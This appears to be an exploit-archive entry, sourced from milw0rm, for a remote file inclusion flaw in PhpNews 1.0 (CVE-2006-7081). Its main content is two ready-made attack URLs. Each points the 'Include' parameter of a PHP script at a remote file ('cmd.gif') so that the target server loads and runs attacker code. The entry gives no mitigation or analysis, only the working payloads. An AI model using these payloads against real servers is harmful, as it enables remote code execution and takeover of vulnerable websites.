PhpNews 1.0 - 'Include' Remote File Inclusion



EKU-ID: 10328 CVE: OSVDB-36840;CVE-2006-7081;OSVDB-36839 OSVDB-ID:
Author: the master Published: 2006-09-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


########################################################################
#  PhpNews v1.0  Remote File Inclusion Vulnerability
#
#  Download: ftp://ftp1.comscripts.com/PHP/36_phpnews-10.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/Include/lib.inc.php3?Include=http://cmd.gif?
#  http://[Target]/[Path]/Include/variables.php3?Include=http://cmd.gif?
########################################################################

# milw0rm.com [2006-09-07]